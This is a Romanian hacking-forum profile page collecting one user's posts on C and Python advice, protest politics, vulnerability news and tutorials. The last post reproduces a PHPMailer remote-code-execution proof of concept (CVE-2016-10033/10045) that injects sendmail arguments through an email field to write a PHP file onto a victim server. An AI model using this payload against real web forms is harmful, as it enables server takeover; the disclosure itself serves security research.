Jump to content

MrGrj

Active Members
 View Profile  See their activity

  • Posts

    1414

  • Joined

  • Last visited

  • Days Won

    44

 Content Type 

Posts posted by MrGrj

  3. Ajutor va rog! C++ Functii,subprograme

    in Programare

    Posted

    22 minutes ago, 3t3r4n said:

    Un mic exemplu: 

    
#include <stdio.h>

int minim(int *vector, int size){
    int minim=vector[0];
    for(int i=0;i<size;i++){
        if(minim>vector[i])
            minim=vector[i];
    }
    return minim;
}


int main()
{
    int a[10]={9,8,7,6,5,4,3,2,-31,3};
    printf("%d",minim(a,10));

    return 0;
}

     

     

    1. Asta e C, nu C++.

    2. Functia nu ar trebui sa primeasca size ca argument - daca am un vector care contine n elemente unde n e un numar foarte mare, ce fac ? Ma apuc si numar elementele de nebun ca sa stiu cat sa aloc pentru argument? Nu mai bine aloci dinamic un vector de marime n, unde n este dat de la tastatura ? 

     

    Anyway, ar trebui ca asta sa-si faca o idee chiar daca pe chat a supt-o si a vrut mura-n gura :) 

     

  4. "Delay Muie Romania" Project

    in Off-topic

    Posted

    4 hours ago, gogusan said:

    Hai sa mananc si eu un cacat pe topicul asta, ca vad ca asa e trendul.

    Sunt in strada din prima seara dar nu protestez pentru ce protesteaza toti de pe langa mine si anume:

    1.

    Toti care sunt in strada scandeaza impotriva OUG si mai exact impotriva pragului ala de 200mii pt abuz in serviciu. Si ca domnle vezi ca s-a dat drumul la hotie. Adica pot sa furi 199mii si scapi. GRESIT PULETILOR! GRESIT! Cand furi ceva nu esti acuzat de abuz in serviciu ci de furt.

    OUG-ul asta nu se aplica la dosarele deja existente (dragnea, oprea etc) ca nu poti aplica retroactiv. Modificarile vor fi valabile pt dosarele viitoare. Deci dragnea nu scapa de dosarul de instigare la abuz in serviciu ci scapa doar de dosarul cu referendum(inchisoare cu suspendare; si scapa de asta datorita legii gratierii nu oug pt codul penal).(inca o muie pt intoxicatori)

    NU CONFUNDATI ABUZUL IN SERVICIU cu FURTUL sau cu LUAREA DE MITA. asa ca multa MUIE la toti intoxicatorii.

     

    2.

    *si aici va las sa va documentati singuri si sa trageti concluziile:

    eu protestez pt modificarile aduse CONFLICTULUI DE INTERESE (si aici vor scapa foarte multi, chiar vor scapa; printre ei se numara: Ponta, UDREA, Ioana Basescu, SOVA, BLAGA, Mazare si multi altii)

     

    Informeaza-te corect. Tu nici nu stii de ce protestezi, doar ti se pare cool ca esti cu tovarasii tai caterinca, hoa hoa, jos pulea, hotilor, rime, caterinca, flower power... _)_

     

    PS: alta intoxicare ca golanii de s-au sicanat cu jandarmii erau din galeria dinamo. o mizerie grasa si fara dovezi. a aruncat-o un BOU la tv sau pe facebook si OILE(asta reprezinta 90% din cei din strada) imediat au halit-o.

     

    PS2: TARA HOTILOR SI IPOCRITILOR!

     

    ^ This.

     

    Asta ar trebui pusa pe un panou si agatata in mijlocul oilor de la proteste. Am auzit multa lume care se duce la protest pe principiu': "Hai coaie sa mergem si noi acolo, apoi dam o bere ca baietii". Asta e mentalitatea romanului si d-aia nu o sa se faca nimic dupa aceste proteste. Romanu' nu stie ce vrea si protesteaza pentru habar nu are ce.

     

    RIP Romania. 

    • Upvote 1

  5. Python Challenge

    in Off-topic

    Posted · Edited by MrGrj

    14 hours ago, SynTAX said:

    Hai salut,

     

    Nu stiu daca a mai fost postat, dar am gasit ceva interesant pe net, pentru entry-level sa zic asa, cautand sa invat putin mai mult Python.

     

    http://www.pythonchallenge.com

     

    Primele levele sunt usoare, am reusit pana la 3, fiind descoperit doar in seara asta. Exista pe net rezolvari, dar ar fi frumos totusi sa nu va uitati si sa-mi spuneti si mie cum le rezolvati, pentru fiecare nivel in parte, ca poate invat si eu ceva nou.

     

    Apropo, pot fi rezolvate si pe foaie, fara sa fie nevoie de cod, dar e mai greu si mai "babesc".

    Am mai postat eu pisi acum ceva timp (ti-am dat si tag) :)) :

     

    https://rstforums.com/forum/topic/16450-lista-siteuri-challenges-wargames/#comment-641265

     

    PWP

  6. excel frontend?

    in Off-topic

    Posted

    Ai mai multe solutii:

     

    Aia manuala: import excelurile in csv (fiecare sheet intr-un csv) apoi faci usor import in orice baza de date decenta.

     

    Automata: faci un script care sa iti transforme excelul in csv-uri si importi iar intr-o baza de date.

    Automata2: faci un script care parseaza direct coloanele din excel si faci insert direct intr-o baza de date cu ce ai tu nevoie.

     

    PS: nu mai spune ca ai o baza de date in excel ca te faci de ras.

    • Upvote 1

  10. salut

    in Bine ai venit

    Posted

    Salutare si bine-ai venit. 

     

    Pentru o experienta cat mai ok pe RST, iti recomand sa stai departe de chat si de sectiunea off-topic. Mai mult, daca ai cunostinte in cele enumerate mai sus, asteptam tutoriale facute de tine.

     

    Peace :) 

    • Upvote 1

  11. Remote Code Execution on Facebook via ImageTragick ($40,000 Bounty)

    in Exploituri

    Posted

    I want to believe that all of you know about ImageMagick and its Tragick. This issue was found in the end of the April, 2016 and due to many processing plugins depends on the ImageMagick library this issue has a huge impact. Since there were evidences that information about this issue was available not only for researchers, who discovered it and ImageMagick’s development team, but also for others, on the 3rd of May, 2016 the information (without PoC) was disclosed. Many of researchers got this low-hanging fruit while discovering applications which were not updated in time. But for some unknowable reason i was not among them. But this was in May:)

     

    Read more...

    • Upvote 1

  12. Ce limbaj mi-ati recomanda sa...

    in Programare

    Posted · Edited by MrGrj

    Nu mai mancati cacat cu C++ / C#. 

     

    Pentru embedded systems folosesti C. Punct. Cu asta incepi. Daca vei incepe cu orice altceva vei ajunge la concluzia ca trebuie sa interfatezi oricum cu C (sau ASM dupa caz) pentru a duce la bun sfarsit anumite taskuri. Dupa ce stapanesti C, te poti duce mai departe catre C++ / Python(raspberry Pi) / Go / Java (Android) si altele.

     

    Spun asta de fiecare data: Sunt cel putin 5 useri / month care deschid un astfel de topic si nu fac nimic. Pun intrebari doar de dragul de a o face si atat. Faptul ca nu ai gasit informatii nu ma duce cu gandul decat la:

     

    1. Nu ai stiut sa dai un search pe google. (pentru ca nu stii engleza)

    2. Esti lenes din cauza motivului de mai sus

    3. Ignorant pentru ca nu te-ai straduit sa faci research pentru ceva ce zici tu ca-i o pasiune.

     

    Sper din nou sa ma insel. Is multe de zis si nu am timpu' necesar de a face asta cu fiecare user. Cand o sa vad ca te intereseaza subiectul cu adevarat si incepi cu adevarat sa studiezi problema, iti voi da (eu si alti membrii) informatii referitoare la orice.

    • Upvote 4

  13. [RST] Pwnthecode [Beta]

    in Proiecte RST

    Posted · Edited by MrGrj

    36 minutes ago, ManutaDeAur said:

    Ce se mai intampla? vad ca fiecare deadline se prelungeste... puteti sa faceti un topic in care sa specificati ca aveti nevoie de voluntari daca asta este ceea ce duceti lipsa

    Proiectul este in mare parte finalizat. @SilenTx0 lucreaza la ceva tutoriale care necesita timp. Motivul pentru care platforma nu este momentan live este ca tutorialele nu sunt gata. Daca un user isi face cont acum, iar noi vom adauga tutoriale apoi, va trebui sa facem downgrade acelui user. Va fi un sistem de badge-uri, rank, experience etc.

     

    Ca tot ai adus vorba de volutari, am avea nevoie de:

    - developeri care sa realizeze aplicatii reale, dar vulnerabile intr-un fel sau altul (nu conteaza limbajul)

     

    Ca si deadline, estimam ca la sfarsitul lui aprilie sa aiba loc releasul de Beta version.

     

    PS: Aveti in vedere faptul ca facem asta free, iar unii dintre noi au joburi, faculta, copii, plm. Aveti rabdare :)

    • Upvote 5

  18. Script ce comentează la postăriile noi ale unei pagini.

    in Programare

    Posted · Edited by MrGrj

    Cateva sfaturi:

     

    - nu mai comenta fiecare linie de cod.

    - fiecare metoda ar trebui sa contina docstring.

    - numele functiilor ar trebui sa fie denumite astfel: getLastPost -> get_last_post (snake_case)

    - regula de mai sus se aplica si la numele variabilelor

    - in jurul operatorilor ar trebui sa existe un singur spatiu

    - cel mai important e ca (,) codul scris sa fie consistent. Foloseste ori double-quotes ori single-quotes cand definesti un string.

    - nu creea variabile inutile, mai ales daca sunt folosite o singura data

    - daca variabilele sunt folosite intr-o singura functie, nu are rost sa le faci globale. Fa-le argumente sau defineste-le in functia respectiva.

    - if __name__ == '__main__'

     

    Cum as face eu:

      

    from facepy import GraphAPI

personal_access_token = ''
graph = GraphAPI(personal_access_token)


def get_last_post(page_id):
    """
    Ce face functia asta ?
    """
    a = graph.get(path='{0}/posts?limit=1'.format(page_id))

    return a['data'][0]['id']


def comment(post_id, text_to_comment):
    """
    Ce face functia asta ?
    """
    graph.post(
        path='{0}/comments'.format(post_id),
        message=text_to_comment
    )


def main(page_to_check='', comment_to_post='This comment was posted using stalkpy'):
    a = get_last_post(page_to_check)

    while True:
        if a == get_last_post(page_to_check):
            print('No new posts Lord Sam')
        else:
            comment(get_last_post(page_to_check), comment_to_post)
            print('Commented on a new post Lord Sam')
            a = get_last_post(page_to_check)


if __name__ == '__main__':
    main()

    Mai multe despre styleguide gasesti aici.

     

    • Upvote 2

  19. (video) Learning Python Web Penetration Testing

    in Tutoriale video

    Posted · Edited by MrGrj

    19 minutes ago, blech said:

    scuze de offtopic dar pentru cineva care incepe sa invete python acum.... sa inceapa cu python 2.x sau cu 3? inteleg ca exista diferente intre ele.

     

     

    Invata direct python 3. Exista diferente, insa Python 3 iti ofera multe avantaje pe care versiunea 2 nu le suporta implicit. Mai multe detalii:

     

    https://wiki.python.org/moin/Python2orPython3

     

    Desigur, ce am zis mai sus + depinde foarte mult de ceea ce vrei sa faci :)

     

     

    1 hour ago, QuoVadis said:

     

    Done:

    aHR0cDovL3guY28vNmxuMDM=

     

    Trebuia doar sa bagi link-ul aici: https://www.base64decode.org/. Mai multe detalii aici

  21. 3 Critical Zero-Day Flaws in PHP 7 Allow Hackers to Hijack over 80% Websites

    in Stiri securitate

    Posted

    Gotta love PHP :X not

     

    Three critical zero-day vulnerabilities have been discovered in PHP 7 that could allow an attacker to take complete control over 80 percent of websites which run on the latest version of the popular web programming language.

    The critical vulnerabilities reside in the unserialized mechanism in PHP 7 – the same mechanism that was found to be vulnerable in PHP 5 as well, allowing hackers to compromise Drupal, Joomla, Magento, vBulletin and PornHub websites and other web servers in the past years by sending maliciously crafted data in client cookies.

    Security researchers at Check Point's exploit research team spent several months examining the unserialized mechanism in PHP 7 and discovered "three fresh and previously unknown vulnerabilities" in the mechanism.


    While researchers discovered flaws in the same mechanism, the vulnerabilities in PHP 7 are different from what was found in PHP 5.

    Tracked as CVE-2016-7479, CVE-2016-7480, and CVE-2016-7478, the zero-day flaws can be exploited in a similar manner as a separate vulnerability (CVE-2015-6832) detailed in Check Point's August report.

    The first two vulnerabilities, if exploited, would allow a hacker to take full control over the target server, enabling the attacker to do anything from spreading malware to steal customer data or to defacing it.


    The third vulnerability could be exploited to generate a Denial of Service (DoS) attack, allowing a hacker to hang the website, exhaust its memory consumption and eventually shut down the target system, researchers explain in their report [PDF].

    According to Yannay Livneh of Check Point's exploit research team, none of the above vulnerabilities were found exploited in the wild by hackers.

    The check Point researchers reported all the three zero-day vulnerabilities to the PHP security team on September 15 and August 6.

    Patches for two of the three flaws were issued by the PHP security team on 13th October and 1st December, but one of them remains unpatched.

    Besides patches, Check Point also released IPS signatures for the three vulnerabilities on the 18th and 31st of October to protect users against any attack that exploits these vulnerabilities.

    In order to ensure the webserver’s security, users are strongly recommended to upgrade their servers to the latest version of PHP.

     

    Source

    • Upvote 1

  24. Writing a Tiny x86 Bootloader

    in Tutoriale in engleza

    Posted · Edited by MrGrj

    It might be from being stuck at home with nothing to do over break, or it might be from an actual interest in low-level systems design, but I've taken it upon myself to learn more about OS implementation, starting with the bootloader. So, here we go. All of this information exists in various other places on the web, but there's no better way to learn than by teaching, right? Either way, this piece should serve as primer on what exactly a bootloader does and how to implement a relatively simple one (compared to a beast like GRUB which is ostensibly its own little operating system).

     

    Intregul tutorial

    • Upvote 2

  25. PHPMailer < 5.2.20 Remote Code Execution (0day Patch Bypass/exploit)

    in Exploituri

    Posted

    An independent research uncovered a critical vulnerability in PHPMailer that could potentially be used by (unauthenticated) remote attackers to achieve remote arbitrary code execution in the context of the web server user and remotely compromise the target web application. To exploit the vulnerability an attacker could target common website components such as contact/feedback forms, registration forms, password email resets and others that send out emails with the help of a vulnerable version of the PHPMailer class. The first patch of the vulnerability CVE-2016-10033 was incomplete. This advisory demonstrates the bypass of the patch.

      

    """
usage = """
Usage:

Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html

https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.txt

PoC Video:
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html

Disclaimer:
For testing purposes only. Do no harm.

"""

import time
import urllib
import urllib2
import socket
import sys

RW_DIR = "/var/www/html/uploads"

url = 'http://VictimWebServer/contact_form.php' # Set destination URL here

# Choose/uncomment one of the payloads:

# PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)
#payload = '"attacker\\" -oQ/tmp/ -X%s/phpcode.php  some"@email.com' % RW_DIR

# Bypass / PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)
payload = "\"attacker\\' -oQ/tmp/ -X%s/phpcode.php  some\"@email.com" % RW_DIR

######################################

# PHP code to be saved into the backdoor php file on the target in RW_DIR
RCE_PHP_CODE = "<?php phpinfo(); ?>"

post_fields = {'action': 'send', 'name': 'Jas Fasola', 'email': payload, 'msg': RCE_PHP_CODE}

# Attack
data = urllib.urlencode(post_fields)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
the_page = response.read()

    Mai multe informatii, aici

    • Upvote 3
×
×
  • Create New...